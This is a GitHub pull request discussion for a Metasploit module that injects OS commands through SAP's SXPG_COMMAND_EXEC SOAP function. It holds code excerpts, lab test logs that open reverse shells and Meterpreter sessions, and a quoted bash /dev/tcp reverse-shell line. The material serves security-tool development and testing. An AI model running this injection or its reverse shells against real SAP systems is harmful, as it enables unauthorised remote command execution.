Skip to content

Loading…

SAP SOAP Service SXPG_COMMAND_EXEC Function Command Injection #1667

Merged
merged 1 commit into from

4 participants

@nmonkee

This module makes use of the SXPG_COMMAND_EXEC Remote Function Call, through the use of the /sap/bc/soap/rfc SOAP service, to inject and execute OS commands.

SAP Note: 1341333 and 1764994.

http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection
https://service.sap.com/sap/support/notes/1764994
https://service.sap.com/sap/support/notes/1341333

@wchen-r7 wchen-r7 commented on an outdated diff
...ts/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
((18 lines not shown))
+# Dmitry Evdokimov.
+#
+# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
+# who have Beta tested the modules and provided excellent feedback. Some people
+# just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize
+ super(
+ 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection',

I feel like this title needs a rename, what do others think?

@todb-r7
todb-r7 added a note

It's long and ugly, but it is descriptive and comports with the existing modules.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wchen-r7 wchen-r7 commented on an outdated diff
...ts/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
((98 lines not shown))
+ data << '<n1:SXPG_COMMAND_EXECUTE xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' + "\r\n"
+ data << '<ADDITIONAL_PARAMETERS>' + command + ' </ADDITIONAL_PARAMETERS>' + "\r\n"
+ data << '<COMMANDNAME>DBMCLI</COMMANDNAME>' + "\r\n"
+ data << '<OPERATINGSYSTEM>ANYOS</OPERATINGSYSTEM>' + "\r\n"
+ data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>' + "\r\n"
+ data << '</n1:SXPG_COMMAND_EXECUTE>' + "\r\n"
+ data << '</env:Body>' + "\r\n"
+ data << '</env:Envelope>' + "\r\n"
+ return data
+ end
+
+ def exec_command(ip,data)
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw(

send_request_cgi() probably works better in this case. Use the "vars_get" option.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wchen-r7 wchen-r7 commented on an outdated diff
...ts/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
((104 lines not shown))
+ data << '</env:Body>' + "\r\n"
+ data << '</env:Envelope>' + "\r\n"
+ return data
+ end
+
+ def exec_command(ip,data)
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw(
+ {
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' => {
+ 'Content-Length' => data.size.to_s,

If you use send_request_cgi(), you don't need to set the content-length header, it's done automatically.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wchen-r7 wchen-r7 commented on an outdated diff
...ts/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb
((107 lines not shown))
+ end
+
+ def exec_command(ip,data)
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
+ begin
+ res = send_request_raw(
+ {
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' => {
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,

Again, if you use send_request_cgi(), you can use the "basic_auth" option instead of setting the Authorization header manually.

@todb-r7
todb-r7 added a note

If I could get clear and concise documentation that made it obvious what the correct template/standard was it would be easier to contribute.

I understand your frustration. Part of the inconsistencies you're seeing is the continuous level of sophistication that we build up as reviewers, though. Barring some kind of head injury, we're all getting smarter about how to review the modules contributors like you are writing. Module writing and reviewing are both pretty subjective -- otherwise you end up with too rigid a framework to do anything useful in. Please don't take the suggestions the wrong way.

@wchen-r7 is ultimately not just bikeshedding here, but suggesting a more appropriate alternative method that is clearly non-obvious. And I agree, it's non-obvious -- the documentation on send_request_raw() and send_request_cgi() in http/client.rb is identical for both methods, so there's no real clue that one is better than the other.

So, documentation-wise, that's clearly a failure on our part. We are working on better in-code documentation and better ways to come up with templates for common patterns, though, so please be patient. We've committed to using YARD as a documentation engine, so hopefully things get better soon there.

In the meantime -- Looking back over your commit history in particular, I see that you've used send_request_raw() a lot. All of @nmonkee's past modules live here and are sap_soap_rfc_*.rb . So, to offer a suggestion back -- it might have been more constructive on your part to offer one of these as a counter-example for @wchen-r7 to consider?

Thanks for the efforts, and thanks for bringing up the frustration. I try to be sensitive to that and if you have other suggestions on how we can more quickly improve the review process, please don't hold back.

@nmonkee
nmonkee added a note

I don't want to go to war over it. I don't get a lot of time to knock out these modules, so I grab the opportunity when I get chance. If you can let me know what you need me to do have this module and the others accepted, in a clear and concise manner, that would be awesome. As I said, not a lot of time, so I'd really like to avoid having to keep re-setting up my lab to test each change etc. I'm receptive to advice on alternatives, but providing rational would help the process. It's a learning process for myself also. Consistency is key. I accept its not easy to obtain.

I would like to help here :)

I just would like to ask if there is a free trial of SAP Application Server for Linux? I only see the Free Trial for Windows.

@nmonkee Do you mind to share link of trial for Linux if it's available and you've located the link?

Thanks in advance,

juan

btw, is it related to #1679 ? If both modules are exploiting the same vulnerability it should be coded just as one "multiplatform" exploit. You can check the exploits at the multi "folder" in order to go comfortable about how to deal with it. Again I can help with this in order to save you time and headaches :-) First of all, clarifying these first doubts and playing a little with them in the meanwhile.

I see. If it's the same vulenrability, even if you're using a different technique for linux (CMD payload vs Staging you mean??) I guess we'll need to merge them. But we can work on it later. At the moment, since I've a windows sap trial we can start with #1679. I switch to this pull request first of all :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7

New test after check:

  • Transaction SIFC and check /sap/bc/soap/rfc is enables
  • Restart SIAC_PUBLISH_ALL_INTERNAL transaction
  • Restart NSP
  • Restart the full machine and SAP awright

Still no working:


msf exploit(sap_soap_rfc_dbmcli_sxpg_command_exec) > show options

Module options (exploit/linux/sap/sap_soap_rfc_dbmcli_sxpg_command_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   OS        linux            yes       Target OS (accepted: linux)
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOST     192.168.172.179  yes       The target address
   RPORT     8042             yes       The target port
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.172.1    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   SAP AS on Linux


msf exploit(sap_soap_rfc_dbmcli_sxpg_command_exec) > rexploit
[*] Reloading module...

[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[*] Started reverse double handler
[-] [SAP] 192.168.172.179:8042 - something went wrong!
[*] [SAP] 192.168.172.179:8042 - sending SOAP SXPG_COMMAND_EXECUTE request
[-] [SAP] 192.168.172.179:8042 - something went wrong!

btw @nmonkee I can't contact with you via email anymore, I get a quota exceeded error.

@jvazquez-r7

As you asked via email, I'm attaching info from the sap_icf_public_info module:

msf auxiliary(sap_icf_public_info) > run

[*] [SAP] 192.168.172.179:8042 - Sending request to SAP Application Server
[*] [SAP] 192.168.172.179:8042 - Response received

[SAP] ICF SAP PUBLIC INFO
=========================

   Key                                    Value
   ---                                    -----
   Central Database System:               ADABAS D
   Character Set:                         4103
   Database Host:                         NPLHOST
   Float Type Format:                     IEEE
   Hostname:                              nplhost
   IPv4 Address:                          192.168.234.42
   IPv6 Address:                          192.168.234.42
   Integer Format:                        Little Endian
   Kernel Release:                        720
   Machine ID:                            390
   Operating System:                      Linux
   RFC Destination:                       nplhost_NPL_42
   RFC Log Version:                       011
   Release Status of SAP System:          702
   System ID:                             NPL
   Timezone (diff from UTC in seconds):   0

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Info from sap_mgmt_con_getprocesslist

msf auxiliary(sap_mgmt_con_getprocesslist) > run

[*] 192.168.172.179:50013 [SAP] Connecting to SAP Management Console SOAP Interface 
[+] 192.168.172.179:50013 [SAP] 2 processes listed

[SAP] Process List
==================

   Name        Description    Status   StartTime            ElapsedTime
   ----        -----------    ------   ---------            -----------
   enserver    EnqueueServer  Running  2013 03 06 21:06:11  0:07:19
   msg_server  MessageServer  Running  2013 03 06 21:06:11  0:07:19

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Any of the "sap_soap_rfc*" modules gives me a similar error:

msf auxiliary(sap_soap_rfc_system_info) > run

[*] [SAP] 192.168.172.179:8042 - sending SOAP RFC_SYSTEM_INFO request
[-] [SAP] 192.168.172.179:8042 - something went wrong!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7

Hi @nmonkee this pull request is being cleaned at nmonkee#10. Plus this pr tries to integrate also #1679. Which has sense for me, since they are abusing the same function, even when using different techniques for exploitation :)

Feel free to check, verify, test, ask, provide feedback etc. Once you feel comfortable merge this pull request, the original one will be automatically updated and we'll be ready to merge I guess :)

  • Test on Linux

VERY IMPORTANT NOTE! : ON THE LINUX TESTDRIVE PLATFORM only the perl and ruby CMD payloads have been verified to work. Because of a limitation in the multi-platform exploits, I dont find any way to restrict allowed payloads from the metadata! So other payloads others than the perl and ruby ones are not expected to work on the testdrive platform.

msf exploit(sap_soap_rfc_sxpg_command_exec) > show options

Module options (exploit/multi/sap/sap_soap_rfc_sxpg_command_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOST     192.168.172.179  yes       The target address
   RPORT     8042             yes       The target port
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.172.1    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf exploit(sap_soap_rfc_sxpg_command_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.179:8042 - Dumping the payload to /tmp/nbe49...
[+] 192.168.172.179:8042 - Payload dump was successful
[*] 192.168.172.179:8042 - Executing /tmp/nbe49...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.179:53091) at 2013-05-07 22:32:18 -0500
id

uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)
uname -a
Linux linux-gateway 2.6.32.43-0.4-default #1 SMP 2011-07-14 14:47:44 +0200 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y

  • Test on Windows
msf exploit(sap_soap_rfc_sxpg_command_exec) > show options

Module options (exploit/multi/sap/sap_soap_rfc_sxpg_command_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       SAP Client
   PASSWORD  06071992         yes       Password
   Proxies                    no        Use a proxy chain
   RHOST     192.168.172.185  yes       The target address
   RPORT     8000             yes       The target port
   USERNAME  SAP*             yes       Username
   VHOST                      no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.172.1    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64

msf exploit(sap_soap_rfc_sxpg_command_exec) > check
e[*] The target service is running, but could not be validated.
msf exploit(sap_soap_rfc_sxpg_command_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.185:8000 - Sending SOAP SXPG_COMMAND_EXECUTE request
[*] Command Stager progress -   2.19% done (249/11366 bytes)
[*] Command Stager progress -   4.38% done (498/11366 bytes)
[*] Command Stager progress -   6.57% done (747/11366 bytes)
[*] Command Stager progress -   8.76% done (996/11366 bytes)
[*] Command Stager progress -  10.95% done (1245/11366 bytes)
[*] Command Stager progress -  13.14% done (1494/11366 bytes)
[*] Command Stager progress -  15.34% done (1743/11366 bytes)
[*] Command Stager progress -  17.53% done (1992/11366 bytes)
[*] Command Stager progress -  19.72% done (2241/11366 bytes)
[*] Command Stager progress -  21.91% done (2490/11366 bytes)
[*] Command Stager progress -  24.10% done (2739/11366 bytes)
[*] Command Stager progress -  26.29% done (2988/11366 bytes)
[*] Command Stager progress -  28.48% done (3237/11366 bytes)
[*] Command Stager progress -  30.67% done (3486/11366 bytes)
[*] Command Stager progress -  32.86% done (3735/11366 bytes)
[*] Command Stager progress -  35.05% done (3984/11366 bytes)
[*] Command Stager progress -  37.24% done (4233/11366 bytes)
[*] Command Stager progress -  39.43% done (4482/11366 bytes)
[*] Command Stager progress -  41.62% done (4731/11366 bytes)
[*] Command Stager progress -  43.81% done (4980/11366 bytes)
[*] Command Stager progress -  46.01% done (5229/11366 bytes)
[*] Command Stager progress -  48.20% done (5478/11366 bytes)
[*] Command Stager progress -  50.39% done (5727/11366 bytes)
[*] Command Stager progress -  52.58% done (5976/11366 bytes)
[*] Command Stager progress -  54.77% done (6225/11366 bytes)
[*] Command Stager progress -  56.96% done (6474/11366 bytes)
[*] Command Stager progress -  59.15% done (6723/11366 bytes)
[*] Command Stager progress -  61.34% done (6972/11366 bytes)
[*] Command Stager progress -  63.53% done (7221/11366 bytes)
[*] Command Stager progress -  65.72% done (7470/11366 bytes)
[*] Command Stager progress -  67.91% done (7719/11366 bytes)
[*] Command Stager progress -  70.10% done (7968/11366 bytes)
[*] Command Stager progress -  72.29% done (8217/11366 bytes)
[*] Command Stager progress -  74.49% done (8466/11366 bytes)
[*] Command Stager progress -  76.68% done (8715/11366 bytes)
[*] Command Stager progress -  78.87% done (8964/11366 bytes)
[*] Command Stager progress -  80.85% done (9189/11366 bytes)
[*] Command Stager progress -  82.76% done (9407/11366 bytes)
[*] Command Stager progress -  84.94% done (9654/11366 bytes)
[*] Command Stager progress -  86.67% done (9851/11366 bytes)
[*] Command Stager progress -  88.50% done (10059/11366 bytes)
[*] Command Stager progress -  90.63% done (10301/11366 bytes)
[*] Command Stager progress -  92.66% done (10532/11366 bytes)
[*] Command Stager progress -  94.67% done (10760/11366 bytes)
[*] Command Stager progress -  95.94% done (10904/11366 bytes)
[*] Command Stager progress -  98.06% done (11146/11366 bytes)
[*] Sending stage (951296 bytes) to 192.168.172.185
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.185:57553) at 2013-05-07 22:39:28 -0500

meterpreter > getuid
Server username: GATEWAY\Administrator
meterpreter > sysinfo
Computer        : GATEWAY
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.185 - Meterpreter session 2 closed.  Reason: User exit

@nmonkee nmonkee Merge pull request #10 from jvazquez-r7/sap_soap_rfc_sxpg_command_exe…
…c_multi

sap_soap_rfc_sxpg_command_exec multi platform and clean up
2d5556f
@nmonkee

I think I probably modified the payload and uncommented :

# same thing, no semicolons
                #return "/bin/bash #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&#{fd} >&#{fd}"

I'll have a play.

@jvazquez-r7

Merging in the meanwhile since it's working, with limitation on the payloads available, but works....

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request
jvazquez-r7 Land #1667, @nmonkee's sap_soap_rfc_sxpg_command_exec exploit 4147a27
@jvazquez-r7 jvazquez-r7 merged commit 2d5556f into rapid7:master

1 check passed

Details default The Travis CI build passed
@nmonkee nmonkee deleted the nmonkee:sap_soap_rfc_dbmcli_sxpg_command_exec_exploit branch
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on May 9, 2013
  1. @nmonkee

    Merge pull request #10 from jvazquez-r7/sap_soap_rfc_sxpg_command_exe…

    nmonkee committed
    …c_multi
    
    sap_soap_rfc_sxpg_command_exec multi platform and clean up
Showing with 0 additions and 0 deletions.
Something went wrong with that request. Please try again.